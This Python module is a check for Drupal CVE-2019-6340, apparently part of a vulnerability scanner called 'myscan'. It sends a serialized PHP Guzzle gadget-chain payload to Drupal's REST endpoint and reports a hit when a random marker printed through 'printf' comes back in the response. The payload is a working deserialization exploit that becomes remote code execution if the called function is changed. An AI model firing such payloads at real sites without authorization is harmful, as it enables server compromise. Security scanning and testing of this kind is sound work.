#!/usr/bin/env python3
# @Time    : 2020-05-09
# @Author  : caicai
# @File    : poc_drupal-cve-2019-6340_2019.py


from myscan.lib.parse.response_parser import response_parser  ##写了一些操作resonse的方法的类
from myscan.lib.helper.request import request  # 修改了requests.request请求的库，建议使用此库，会在redis计数
from myscan.config import scan_set
from myscan.lib.core.common import get_random_str, get_random_num


class POC():
    def __init__(self, workdata):
        self.dictdata = workdata.get("dictdata")  # python的dict数据，详情请看docs/开发指南Example dict数据示例
        self.url = workdata.get("data")  # self.url为需要测试的url，值为目录url，会以/结尾,如https://www.baidu.com/home/ ,为目录
        self.result = []  # 此result保存dict数据，dict需包含name,url,level,detail字段，detail字段值必须为dict。如下self.result.append代码
        self.name = "drupal-cve-2019-6340"
        self.vulmsg = "referer:https://github.com/knqyf263/CVE-2019-6340"
        self.level = 2  # 0:Low  1:Medium 2:High

    def verify(self):
        # 根据config.py 配置的深度，限定一下目录深度
        if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
            return
        random_str1 = get_random_str(4).lower()
        random_str2 = get_random_str(4).lower()
        payload = r'''{
  "link": [
    {
      "value": "link",
      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:10:\"%s\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"printf\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
    }
  ],
  "_links": {
    "type": {
      "href": "http://%s/rest/type/shortcut/default"
    }
  }
}
        ''' % (random_str1 + "%%" + random_str2, self.dictdata.get("url").get("host"))

        req = {
            "method": "POST",
            "url": self.url + "node/?_format=hal_json",
            "headers": {
                'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
                'Connection': "close",
                'Content-Type': "application/hal+json",
                'Accept': "*/*",
                'Cache-Control': "no-cache"
            },
            "data": payload,
            "timeout": 10,
            "allow_redirects": False,
            "verify": False,
        }
        r = request(**req)
        if r != None and r.status_code == 403 and b"u0027access" in r.content and "{}%{}".format(random_str1,
                                                                                                 random_str2).encode() in r.content:
            parser_ = response_parser(r)
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": 2,  # 0:Low  1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "request": parser_.getrequestraw(),
                    "response": parser_.getresponseraw()
                }

            })
        elif r !=None and r.status_code==422 and b" correspond to an entity on this site" in r.content:
            parser_ = response_parser(r)
            self.result.append({
                "name": self.name,
                "url": self.url,
                "level": 0,  # 0:Low  1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "others": 'change the port to try. or delete the port .where in href": "http://%s/rest/type/shortcut/default ',
                    "request": parser_.getrequestraw(),
                    "response": parser_.getresponseraw()
                }

            })

